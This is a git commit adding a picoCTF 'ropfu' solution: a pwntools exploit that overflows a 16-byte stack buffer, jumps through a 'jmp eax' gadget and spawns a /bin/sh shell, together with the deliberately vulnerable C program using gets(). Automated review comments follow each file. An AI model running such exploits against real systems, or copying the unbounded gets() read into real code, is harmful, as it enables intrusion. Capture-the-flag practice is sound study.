pwn/ropfu

2026-07-03 17:02:59 +09:00
parent a0e80a7aa4
commit a0718eed0c
3 changed files with 70 additions and 0 deletions
+43
@@ -0,0 +1,43 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
offset = 28 # found with pwndbg
rop = ROP(exe)
jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
for _ in range(offset - len(jmp_eax)):
rop.raw(asm('nop'))
rop.raw(jmp_eax)
# NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
jmp_eax_gadget = next(exe.search(asm("jmp eax")))
rop.raw(jmp_eax_gadget)
rop.raw(asm(shellcraft.i386.linux.sh()))
r.sendline(rop.chain())
r.interactive()
r.close()
if __name__ == "__main__":
main()
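Review bot: `jmp_eax_gadget = next(exe.search(asm("jmp eax")))` raises a bare `StopIteration` with no message when the byte pattern is absent from `./vuln`, so a rebuilt or different binary fails with an unhelpful traceback rather than a clear diagnostic; `jmp_eax_gadget = next(exe.search(asm("jmp eax")), None)` followed by `if jmp_eax_gadget is None: raise SystemExit("jmp eax not found in binary")` makes the failure explicit. The `for _ in range(offset - len(jmp_eax)): rop.raw(asm('nop'))` loop assembles the same instruction once per iteration; `rop.raw(asm('nop') * (offset - len(jmp_eax)))` is one call and reads as the padding it is. Since blank lines were lost in rendering, `conn()` and `main()` appear to be complete within the hunk but their exact spacing cannot be confirmed here.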
+27
@@ -0,0 +1,27 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 16
void vuln() {
char buf[16];
printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}
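Review bot: `return gets(buf);` inside `void vuln()` returns a value from a function declared `void`, which is a constraint violation in C that compilers reject or warn on; the intended form is `gets(buf);` on its own line. `#define BUFSIZE 16` is then unused because `buf` is declared with the literal `char buf[16];` — use `char buf[BUFSIZE];` so the macro and the array size cannot drift apart. `gets` reads without any bound and was removed from C11; if the unbounded read into the 16-byte stack buffer is the deliberate challenge behaviour, say so next to it (`// intentionally unbounded read: this is the challenge`), otherwise `fgets(buf, sizeof buf, stdin)` is the bounded replacement. `setresgid` is a non-standard extension and, depending on the compiler's feature macros, may need `_GNU_SOURCE` defined before the includes to be declared; a missing prototype would be an implicit-declaration error on modern compilers.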